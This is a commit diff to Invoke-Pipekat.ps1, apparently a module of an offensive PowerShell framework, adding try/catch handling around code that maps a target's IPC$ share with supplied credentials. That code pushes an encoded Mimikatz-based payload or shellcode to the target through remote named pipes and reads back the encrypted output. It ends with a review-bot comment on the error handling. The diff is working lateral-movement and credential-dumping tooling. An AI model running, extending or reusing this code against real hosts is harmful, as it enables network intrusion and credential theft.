Added better error handling
benpturner committed May 30, 2017
1 parent dd8c694 commit 068437b
Showing 1 changed file with 36 additions and 10 deletions.
46 changes: 36 additions & 10 deletions Modules/Invoke-Pipekat.ps1
@@ -203,13 +203,17 @@ IEX $wmicmd
}

echo "`n[+] Waiting for output from named pipe.......`n"
try {
add-Type -assembly "System.Core";
$pi = new-object System.IO.Pipes.NamedPipeClientStream("$pipeNameMimi");
$pi.Connect($TimeoutMS); $pr = new-object System.IO.StreamReader($pi);
$wp = $pr.ReadLine();
$pi.Dispose(); $pr.Dispose();
$pl = Decrypt-String -key $pipekey -encryptedStringWithIV $wp
$pl
} catch {
echo "Failed conecting to named pipe: $pipeNameMimi"
}

} else {
if($Hash) {echo "Cannot use a hash when executing shellcode remotely as it rquired the password to create a pipe session...."; return}
@@ -322,23 +326,38 @@ $mkun = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64Strin
$mkun += $postmimi
$Bytes = [System.Text.Encoding]::UTF8.GetBytes($mkun)
$ed = [Convert]::ToBase64String($Bytes)
add-Type -assembly "System.Core"

if ($domain -eq ".") {
$net = new-object -ComObject WScript.Network
$net.MapNetworkDrive("", "\\$target\ipc$", $false, "$username", "$Password")
} else {
$net = new-object -ComObject WScript.Network
$net.MapNetworkDrive("", "\\$target\ipc$", $false, "$domain\$username", "$Password")
}
try {
add-Type -assembly "System.Core"
$p = new-object System.IO.Pipes.NamedPipeClientStream($target, $pipeName);
$w = new-object System.IO.StreamWriter($p)
$p.Connect($TimeoutMS); $w.WriteLine($ed);
$w.Dispose(); $p.Dispose();
add-Type -assembly "System.Core";$p = new-object System.IO.Pipes.NamedPipeClientStream($target, $pipeNameMimi);
$p.Connect($TimeoutMS);$r = new-object System.IO.StreamReader($p);
$rr=$r.ReadLine();$p.Dispose();$r.Dispose();
$p.Connect($TimeoutMS);
$w.WriteLine($ed);
$w.Dispose();
$p.Dispose();
} catch {
echo "Failed conecting to named pipe: $target : $pipeName"
}
try {
add-Type -assembly "System.Core";
$p = new-object System.IO.Pipes.NamedPipeClientStream($target, $pipeNameMimi);
$p.Connect($TimeoutMS);
$r = new-object System.IO.StreamReader($p);
$rr=$r.ReadLine();
$p.Dispose();
$r.Dispose();
$pl = Decrypt-String -key $pipekey -encryptedStringWithIV $rr
$pl
} catch {
echo "Failed conecting to named pipe: $target : $pipeNameMimi"
}

}
} else {
@@ -423,19 +442,26 @@ $mkun = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64Strin
$mkun += $sc32
$Bytes = [System.Text.Encoding]::UTF8.GetBytes($mkun)
$ed = [Convert]::ToBase64String($Bytes)
add-Type -assembly "System.Core"

if ($domain -eq ".") {
$net = new-object -ComObject WScript.Network
$net.MapNetworkDrive("", "\\$target\ipc$", $false, "$username", "$Password")
} else {
$net = new-object -ComObject WScript.Network
$net.MapNetworkDrive("", "\\$target\ipc$", $false, "$domain\$username", "$Password")
}

try {
add-Type -assembly "System.Core"
$p = new-object System.IO.Pipes.NamedPipeClientStream($target, $pipeName);
$w = new-object System.IO.StreamWriter($p)
$p.Connect($TimeoutMS); $w.WriteLine($ed);
$w.Dispose(); $p.Dispose();

$p.Connect($TimeoutMS);
$w.WriteLine($ed);
$w.Dispose();
$p.Dispose();
} catch {
echo "Failed conecting to named pipe: $target : $pipeName"
}
}

}
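Review bot: The added `catch` blocks label every failure inside their `try` as a pipe connection failure and drop the error record, so in the two read paths (`$pipeNameMimi`, first and second hunks) a `Decrypt-String` error on an empty or malformed `ReadLine()` result is reported the same way as a `Connect($TimeoutMS)` timeout. Keeping the cause in the message, e.g. `echo "Failed connecting to named pipe: $target : $pipeName - $($_.Exception.Message)"`, would make the two distinguishable (and fixes the "conecting" typo). The `Dispose()` calls sit after `Connect`/`WriteLine` inside the `try`, so they are skipped whenever the `catch` runs; a `finally` block would release the pipe and stream handles on both paths. The page has lost its `+`/`-` markers, so which of the duplicated `Connect`/`WriteLine` lines belong to the new side is inferred, and the enclosing function starts and ends outside these hunks.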
